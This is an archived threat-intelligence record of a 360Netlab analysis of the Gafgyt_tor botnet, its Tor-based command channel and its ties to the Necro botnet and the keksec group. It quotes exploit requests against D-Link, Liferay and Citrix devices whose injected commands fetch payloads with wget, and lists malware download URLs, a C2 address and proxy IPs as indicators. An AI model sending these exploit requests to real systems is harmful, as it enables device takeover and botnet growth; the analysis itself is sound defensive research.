{
	"id": "c10307fa-ff9f-4763-ae2f-d463efa2ca86",
	"created_at": "2026-04-06T00:09:51.590006Z",
	"updated_at": "2026-04-10T03:25:15.771778Z",
	"deleted_at": null,
	"sha1_hash": "44330d4c91bdb0409502e19e28be97f91d36b702",
	"title": "Gafgtyt_tor and Necro are on the move again",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 572660,
	"plain_text": "Gafgtyt_tor and Necro are on the move again\r\nBy jinye\r\nPublished: 2021-03-04 · Archived: 2026-04-02 12:47:04 UTC\r\nOverview\r\nSince February 15, 2021, 360Netlab's BotMon system has continuously detected a new variant of the Gafgyt\r\nfamily, which uses Tor for C2 communication to hide the real C2 and encrypts sensitive strings in the samples.\r\nThis is the first time we found a Gafgyt variant using the Tor mechanism, so we named the variant Gafgyt_tor.\r\nFurther analysis revealed that the family is closely related to the Necro family we made public in January, and is\r\nbehind the same group of people, the so-called keksec group [1] [2]. In this blog, we will introduce Gafgyt_tor\r\nand sort out other recent botnets operated by this group.\r\nThe key points of this article are as follows.\r\n1. Gafgyt_tor uses Tor to hide C2 communication, over 100 Tor proxies can be built in, and new samples are\r\ncontinuously updating the proxy list.\r\n2. Gafgyt_tor share the same origin with the Gafgyt samples discturibed by the keksec group, the core\r\nfunction is still DDoS attacks and scanning.\r\n3. The keksec group reuse the code between different bot families.\r\n4. In addition, the keksec group also reuse a bunch of IP addresses for a long time.\r\nSample Analysis\r\nPropagation\r\nThe currently discovered Gafgyt_tor botnet is mainly propagated through Telnet weak passwords and the\r\nfollowing three vulnerabilities.\r\nD-Link RCE (CVE-2019-16920)\r\nPOST /apply_sec.cgi HTTP/1.1\r\nHost: %s:%d\r\nUser-Agent: kpin\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: close\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 1 of 17\n\nReferer: http://%s:%d/login_pic.asp\r\nCookie: uid=1234123\r\nUpgrade-Insecure-Requests: 1\r\nhtml_response_page=login_pic.asp\u0026action=ping_test\u0026ping_ipaddr=127.0.0.1%%0acd%%20%%2Ftmp;busybox%%20wget%%20http\r\nLiferay Portal RCE\r\nPOST /api/jsonws/expandocolumn/update-column HTTP/1.1\r\nHost: %s:%d\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.25.0\r\nContent-Length: %d\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic dGVzdEBsaWZlcmF5LmNvbTp0ZXN0\r\n%2BdefaultData=com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\u0026defaultData.userOverridesAsString=HexAsciiSer\r\nCitrix CVE-2019-19781\r\n POST /vpns/portal/scripts/newbm.pl HTTP/1.1\r\n Host: %s:%d\r\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0\r\n Accept-Encoding: gzip, deflate\r\n Accept: */*\r\n Connection: keep-alive\r\n NSC_USER: ../../../netscaler/portal/templates/flialwznxz\r\n NSC_NONCE: 12\r\n Content-Length: %d\r\n Content-Type: application/x-www-form-urlencoded\r\n \r\n url=127.0.0.1\u0026title=%%5B%%25+template.new%%28%%7B%%27BLOCK%%27%%3D%%27print+readpipe%%28%%22cd+%%2Ftmp%%3Bwget+\r\nEncryption\r\nGafgyt_tor integrates a replacement encryption algorithm for encrypting C2 and sensitive strings to counter\r\ndetection and static analysis. Sensitive strings include commands, IPC pathnames, DDoS-related attack strings,\r\netc.\r\nThe following is a comparison of ciphertext and plaintext C2.\r\n# ciphertext\r\n'\"?\u003eK!tF\u003eiorZ:ww_uBw3Bw'\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 2 of 17\n\n# plaintext\r\n'wvp3te7pkfczmnnl.onion'\r\nThe Gafgyt_tor variants we detected so far all use the same C2 wvp3te7pkfczmnnl.onion.\r\nSome of the cipher decryption results are as follows.\r\n# commands\r\n~-6mvgmv - LDSERVER\r\n1-| - UDP\r\ncD| - TCP\r\nej~- - HOLD\r\n51,U - JUNK\r\nc~6 - TLS\r\n6c- - STD\r\n-,6 - DNS\r\n6D7,,mv - SCANNER\r\nj, - ON\r\njdd - OFF\r\njge - OVH\r\n.~7DU,1v6m - BLACKNURSE\r\n# DDoS-related attack\r\n7~~ - ALL\r\n6p, - SYN\r\nv6c - RST\r\ndx, - FIN\r\n7DU - ACK\r\n|6e - PSH\r\n# Scan-related\r\naDbwwtr3bw - WChnnecihn\r\naQuq - W.1\r\naEcc - WxTT\r\n74tw! - Agent\r\n1;t= - User\r\n# misc\r\n|x,\u003c - PING\r\n=ru_Brf_ - rc.local\r\nThe following is the python decryption code we wrote based on the inverse results.\r\n def decode(encoded, encodes):\r\n idx = 0\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 3 of 17\n\ndecodes = b'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. '\r\n decoded = bytearray()\r\n while ( idx \u003c len(encoded)):\r\n for table_idx in range(0, 64):\r\n if encoded[idx] == encodes[table_idx]:\r\n decoded.append(decodes[table_idx])\r\n idx += 1\r\n print(decoded)\r\n \r\nencodes = b'%q*KC)\u0026F98fsr2to4b3yi_:wB\u003ez=;!k?\"EAZ7.D-md\u003cex5U~h,j|$v6c1ga+p@un'\r\nencoded_cc = b'\"?\u003eK!tF\u003eiorZ:ww_uBw3Bw'\r\ndecode(encoded_cc, encodes)\r\nCommunication\r\nCompared with other Gafgyt variants, the biggest change of Gafgyt_tor is that the C2 communication is based on\r\nTor, which increases the difficulty of detection and blocking. The Tor-based C2 communication mechanism has\r\nbeen seen in other families we have analyzed before( Matryosh leethozer moobot ), but this is the first time we\r\nencountered it in the Gafgyt family.\r\nCode changes\r\nCompared with other versions, the code structure of the main function of Gafgyt_tor, which adds the Tor proxy\r\nfunction, has changed very much, as shown in the following figure.\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 4 of 17\n\nThe original initConnection() function, which is responsible for establishing the C2 connection, is gone, replaced\r\nby a large section of code responsible for establishing the Tor connection. The newly added Tor-related functions\r\nare as follows.\r\nAmong them, tor_socket_init is responsible for initializing a list of proxy nodes, each containing an ip address and\r\na port.\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 5 of 17\n\nOur analysis shows that the number of proxy nodes integrated in each sample is always 100+, with a maximum of\r\n173.\r\nAfter initializing the proxy list, the sample will select a random node from the list to enable Tor communication\r\nvia tor_retrieve_addr and tor_retrieve_port.\r\nAfter establishing a connection with the Tor proxy, Gafgyt_tor starts requesting wvp3te7pkfczmnnl.onion through\r\nthe darknet waiting for instructions. This C2 address has not changed in the samples we have analyzed, but the\r\ncommunication port is continuously changing.\r\nThe command\r\nThe core function of Gafgyt_tor is still DDoS attack and scanning, so it mostly follows the common Gafgyt\r\ndirective, a new directive called LDSERVER has been added. C2 can specify the download server used in\r\nGafgyt_tor's exploit through this directive, as shown in the figure below.\r\nThis directive means that C2 can dynamically switch download servers, so that it can quickly switch to a new\r\ndownload server to continue propagation if the current one is blocked.\r\nSome other things\r\nGafgyt_tor uses a few uncommon coding tricks in addition to the modification of the communication function.\r\nSingleton mode\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 6 of 17\n\nSingle instance mode is implemented using Unix domain sockets (an IPC mechanism), which requires a pathname\r\nto be specified, which is also encrypted. As shown below, k4=f2t is decrypted to ugrade.\r\nFunction name obfuscation\r\nNone of the Gafgyt_tor samples we collected have been stripped, so the complete symbolic information is\r\npreserved in the samples, and most of the samples are scanned and propagated using a function named ak47Scan.\r\nIn the sample captured on February 24 we found that the function name was obfuscated as a random string, so it\r\ncan be assumed that the sample is in active development stage and the authors are gradually strengthening\r\nGafgyt_tor's ability to counter analysis and detection.\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 7 of 17\n\nSample origin\r\nWhile analyzing the IoC of Gafgyt_tor, we noticed that a download server IP 45.145.185.83 was used by Necro\r\nbotnet, which appeared in early January this year:\r\ngxbrowser.net is one of Necro's 3 C2s, and the above image shows that it has resolved to this download server IP\r\nof Gafgyt_tor several times.\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 8 of 17\n\nFurther analysis shows that this IP and another Necro C2 IP 193.239.147.224 were also used as C2 by other\r\nversions of Gafgyt and Tsunami botnet in early February, which apparently share code with Gafgyt_tor.\r\n1. Both have decryption functions named decode, with identical code structures.\r\n2. Both have scan functions named ak47scan and ak47telscan.\r\nTheir decode function decode() differs only in the code table.\r\n# Code table in the gafgyt sample\r\n'%q*KC)\u0026F98fsr2to4b3yi_:wB\u003ez=;!k?\"EAZ7.D-md\u003cex5U~h,j|$v6c1ga+p@un0'\r\n# Code table in tsunami sample\r\n'xm@_;w,B-Z*j?nvE|sq1o$3\"7zKC\u003cF)utAr.p%=\u003e4ihgfe6cba~\u00265Dk2d!8+9Uy:0'\r\nThe following figure is a comparison of their ak47scan() functions, you can see that the function and structure is\r\nactually similar, but there are changes in the way it runs and the ports it scans.\r\nBased on the binary characteristics of the decode() and ak47scan() functions mentioned above, we found more\r\nsuch Tsunami and Gafgyt samples in our sample database, which are characterized as follows.\r\n1. Tsunami samples appear in mid-August 2020 and are active for a short period of time.\r\n2. Gafgyt samples were spreading intermittently from September to December 2020.\r\n3. From early to mid-February, first Tsunami samples resumed propagation, then Gafgyt, followed by\r\nGafgyt_tor.\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 9 of 17\n\n4. There are many similarities between the currently spreading Gafgyt_tor variants and the previously\r\ncaptured Gafgyt samples, and the code is clearly same origin.\r\n5. These variants of botnet frequently reuse same download server and C2 IP.\r\nWe can see that there was no update in January this year, we guess because the authors focused their efforts on\r\nNecro. In terms of binary characteristics, there is no similarity with Gafgyt_tor as Necro is written in Python, but\r\nwe see there are some commonalities in propagation methods.\r\n1. Both changed different exploits in a short period of time, presumably to improve the propagation effect.\r\n2. Both adopted the \"develop-and-distribute\" approach to continuously improve the botnet function, resulting\r\nin a large number of different samples being distributed in a short period of time.\r\nBased on the above analysis, we think that Gafgyt_tor and Necro are very likely operated by the same group of\r\npeople, who have a pool of IP addresses and multiple botnet source codes, and have the ability of continuous\r\ndevelopment. In actual operation, they form different families of botnets, but reuse infrastructure such as IP\r\naddress, for example, the above-mentioned IP 45.145.185.83 address acts as different C2 for different botnets\r\nsince the end of last year, the timeline of different functions is roughly shown in the figure below.\r\nHere are some conclusions about the group:\r\n1. They have at least the source code for Necro, Gafgyt and Tsunami.\r\n2. They continue to upgrade and rotate the botnets in their hands.\r\n3. They have a pool of IP address resources and reuse them in different botnets.\r\n4. The group also keeps up with n-day vulnerabilities in IoT and use them promptly to facilitate their own\r\nbotnets.\r\nThe timeline chart below shows the Linux IoT botnet family operated by this group that we detected from last\r\nAugust to now.\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 10 of 17\n\nReaders are always welcomed to reach us on twitter, or email to netlab at 360 dot cn.\r\nIoC\r\nMD5\r\n# tsunami\r\n3ab32e92917070942135f5c5a545127d\r\n# gafgyt\r\nf1d6fbd0b4e6c6176e7e89f1d1784d14\r\n# gafgyt_tor\r\neb77fa43bb857e68dd1f7fab04ed0de4\r\ndce3d16ea9672efe528f74949403dc93\r\nbfaa01127e03a119d74bdb4cb0f557ec\r\na6bdf72b8011be1edc69c9df90b5e0f2\r\n5c1153608be582c28e3287522d76c02f\r\n54e2687070de214973bdc3bc975049b5\r\nb40d8a44b011b79178180a657b052527\r\n1cc68eb2d9713925d692194bd0523783\r\n94a587198b464fc4f73a29c8d8d6e420\r\n2b2940d168a60990377fea8b6158ba22\r\n56439912093d9c1bf08e34d743961763\r\n2d6917fe413163a7be7936a0609a0c2d\r\n8cd99b32ec514f348f4273a814f97e79\r\n1c966d79319e68ccc66f1a2231040adb\r\n47275afdb412321610c08576890093d7\r\n3c5758723980e6b9315ac6e6c32e261d\r\n980d4d0ac9335ae1db6938e8aeb3e757\r\n513bc0091dfa208249bd1e6a66d9d79e\r\n8e551c76a6b17299da795c2b69bb6805\r\n61b93c03cb5af31b82c11d0c86f82be1\r\n69cab222e42c7177655f490d849e18c5\r\n7cbdd215e7f1e17fc589de2df3f09ac9\r\n6b631fed1416c2cd16ca01738fdfe61a\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 11 of 17\n\n90a716280fe1baee0f056a79c3aa724d\r\n3b4f844c7dd870e8b8c1d5a397a29514\r\n853dc777c5959db7056f64b34e938ba5\r\n3eccab18fa690bbfdb6e10348bc40b02\r\ne78e04aad0915f2febcbb19ef6ffc4fe\r\nb99115a6ea41d85dea5c96d799e65353\r\n4b95dfc5dc523f29eebf7d50e98187c2\r\n4c271f8068bc64686b241eb002e15459\r\n843a7fec9a8e2398a69dd7dfc49afdd2\r\n7122bcd084d2d0e721ec7c01cf2a6a57\r\n10f6b09f88e0cf589d69a764ff4f455b\r\nf91083e19eed003ac400c1e94eba395e\r\nC2\r\nwvp3te7pkfczmnnl.onion\r\nDownload URL\r\nhttp://45.153.203.124/bins/AJhkewbfwefWEFx86\r\nhttp://45.153.203.124/bins/AJhkewbfwefWEFsh4\r\nhttp://45.153.203.124/bins/AJhkewbfwefWEFmips\r\nhttp://45.153.203.124/S1eJ3/lPxdChtp3zx86\r\nhttp://45.153.203.124/S1eJ3/lPxdChtp3zsh4\r\nhttp://45.153.203.124/S1eJ3/lPxdChtp3zppc-440fp\r\nhttp://45.153.203.124/S1eJ3/lPxdChtp3zmpsl\r\nhttp://45.153.203.124/S1eJ3/lPxdChtp3zmips\r\nhttp://45.153.203.124/S1eJ3/lPxdChtp3zarm7\r\nhttp://45.153.203.124/S1eJ3/lPxdChtp3zarm\r\nhttp://45.145.185.83/bins/AJhkewbfwefWEFx86\r\nhttp://45.145.185.83/bins/AJhkewbfwefWEFspc\r\nhttp://45.145.185.83/bins/AJhkewbfwefWEFsh4\r\nhttp://45.145.185.83/bins/AJhkewbfwefWEFppc\r\nhttp://45.145.185.83/bins/AJhkewbfwefWEFmips\r\nhttp://45.145.185.83/bins/AJhkewbfwefWEFi586\r\nhttp://45.145.185.83/bins/AJhkewbfwefWEFarm7\r\nhttp://45.145.185.83/bins/AJhkewbfwefWEFarm\r\nhttp://45.145.185.83/S1eJ3/lPxdChtp3zsh4\r\nhttp://45.145.185.83/S1eJ3/lPxdChtp3zmpsl\r\nhttp://45.145.185.83/S1eJ3/lPxdChtp3zmips\r\nhttp://45.145.185.83/S1eJ3/lPxdChtp3zi686\r\nhttp://45.145.185.83/S1eJ3/lPxdChtp3zbsd\r\nhttp://45.145.185.83/S1eJ3/lPxdChtp3zarm7\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 12 of 17\n\nhttp://45.145.185.83/S1eJ3/lPxdChtp3zarm64\r\nhttp://45.145.185.83/S1eJ3/lPxdChtp3zarm\r\nhttp://45.145.185.83/S1eJ3/IObeENwjx86\r\nhttp://45.145.185.83/S1eJ3/IObeENwjmips\r\nhttp://45.145.185.83/S1eJ3/IObeENwjarm5\r\nhttp://45.145.185.83/S1eJ3/IObeENwjarm4\r\nhttp://45.145.185.83/S1eJ3/IObeENwjarm\r\nTor Proxy\r\n103.125.218.111\r\n103.125.218.111\r\n103.82.219.42\r\n104.155.207.91\r\n104.224.179.229\r\n107.20.204.32\r\n111.90.159.138\r\n116.202.107.151\r\n116.203.210.124\r\n116.203.210.124\r\n116.203.210.124\r\n116.203.210.124\r\n116.203.210.124\r\n119.28.149.37\r\n128.199.45.26\r\n130.193.56.117\r\n134.122.4.130\r\n134.122.4.130\r\n134.122.59.236\r\n134.122.59.236\r\n134.122.59.236\r\n134.209.230.13\r\n134.209.249.97\r\n135.181.137.237\r\n138.68.6.227\r\n139.162.149.58\r\n139.162.32.82\r\n139.162.42.124\r\n139.99.239.154\r\n142.47.219.133\r\n143.110.230.187\r\n145.239.83.129\r\n146.59.156.72\r\n146.59.156.76\r\n146.59.156.77\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 13 of 17\n\n146.66.180.176\r\n148.251.177.144\r\n157.230.27.96\r\n157.230.98.211\r\n157.230.98.77\r\n158.174.108.130\r\n158.174.108.130\r\n158.174.108.130\r\n158.174.108.130\r\n158.174.108.130\r\n158.174.108.130\r\n158.174.108.130\r\n158.247.211.132\r\n159.65.69.186\r\n159.69.203.65\r\n159.69.203.65\r\n159.89.19.9\r\n161.35.84.202\r\n165.22.194.250\r\n165.22.94.245\r\n167.172.123.221\r\n167.172.173.3\r\n167.172.177.33\r\n167.172.178.215\r\n167.172.179.199\r\n167.172.180.219\r\n167.172.190.42\r\n167.233.6.47\r\n167.71.236.109\r\n168.119.37.152\r\n168.119.37.152\r\n168.119.37.152\r\n168.119.37.152\r\n168.119.37.152\r\n168.119.61.251\r\n172.104.240.74\r\n172.104.4.144\r\n176.37.245.132\r\n178.62.215.4\r\n18.191.18.101\r\n18.229.49.115\r\n185.105.237.253\r\n185.106.121.176\r\n185.106.122.10\r\n185.128.139.56\r\n185.180.223.198\r\n185.18.215.170\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 14 of 17\n\n185.18.215.178\r\n185.212.128.115\r\n185.212.128.115\r\n185.212.128.115\r\n185.212.128.115\r\n185.212.128.115\r\n185.212.128.115\r\n185.217.1.30\r\n188.127.231.152\r\n188.165.233.121\r\n188.166.17.35\r\n188.166.34.137\r\n188.166.79.209\r\n188.166.79.209\r\n188.166.80.74\r\n188.166.82.232\r\n188.166.82.232\r\n188.227.224.110\r\n188.68.52.220\r\n192.46.209.98\r\n192.99.169.229\r\n193.123.35.48\r\n193.187.173.33\r\n195.123.222.9\r\n195.93.173.53\r\n197.156.89.19\r\n198.27.82.186\r\n198.74.54.182\r\n199.247.4.110\r\n201.40.122.152\r\n20.52.130.140\r\n20.52.130.140\r\n20.52.130.140\r\n20.52.147.137\r\n20.52.37.89\r\n20.52.37.89\r\n206.81.17.232\r\n206.81.27.29\r\n212.71.253.168\r\n212.8.244.112\r\n217.12.201.190\r\n217.12.201.190\r\n217.12.201.190\r\n217.144.173.78\r\n217.170.127.226\r\n217.61.98.33\r\n34.239.11.167\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 15 of 17\n\n35.189.88.51\r\n35.192.111.58\r\n35.192.111.58\r\n37.200.66.166\r\n3.91.139.103\r\n45.33.45.209\r\n45.33.79.19\r\n45.33.82.126\r\n45.79.207.110\r\n45.81.225.67\r\n45.81.225.67\r\n45.81.226.8\r\n45.81.226.8\r\n45.81.226.8\r\n45.92.94.83\r\n46.101.156.38\r\n46.101.159.138\r\n47.90.1.153\r\n49.147.80.102\r\n50.116.61.125\r\n5.100.80.141\r\n51.11.240.222\r\n51.11.240.222\r\n51.116.185.181\r\n51.116.185.181\r\n51.195.201.47\r\n51.195.201.50\r\n5.167.53.191\r\n51.68.191.153\r\n51.75.161.21\r\n51.83.185.71\r\n51.83.186.137\r\n51.89.165.233\r\n52.47.87.178\r\n5.63.13.54\r\n66.42.34.110\r\n67.205.130.65\r\n68.183.67.182\r\n68.183.82.50\r\n79.124.62.26\r\n80.251.220.190\r\n8.210.163.246\r\n8.210.163.246\r\n87.236.215.248\r\n88.198.167.20\r\n88.198.167.20\r\n91.236.251.131\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 16 of 17\n\n94.23.40.220\r\n95.179.163.1\r\n95.179.163.1\r\n95.179.163.1\r\n95.179.163.1\r\n95.179.164.28\r\n95.179.164.28\r\n95.179.164.28\r\n95.188.93.135\r\n95.216.123.39\r\n95.216.137.149\r\n95.217.27.5\r\nReferences\r\nhttps://blog.netlab.360.com/necro/\r\nhttps://mp.weixin.qq.com/s/D30y0qeicKnHmP9Kad-pmg\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nSource: https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nhttps://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/"
	],
	"report_names": [
		"gafgtyt_tor-and-necro-are-on-the-move-again"
	],
	"threat_actors": [
		{
			"id": "5a270f6c-2c13-4abf-861e-7d44dcfa5ceb",
			"created_at": "2023-11-03T02:00:07.794425Z",
			"updated_at": "2026-04-10T02:00:03.383096Z",
			"deleted_at": null,
			"main_name": "Keksec",
			"aliases": [],
			"source_name": "MISPGALAXY:Keksec",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434191,
	"ts_updated_at": 1775791515,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/44330d4c91bdb0409502e19e28be97f91d36b702.pdf",
		"text": "https://archive.orkl.eu/44330d4c91bdb0409502e19e28be97f91d36b702.txt",
		"img": "https://archive.orkl.eu/44330d4c91bdb0409502e19e28be97f91d36b702.jpg"
	}
}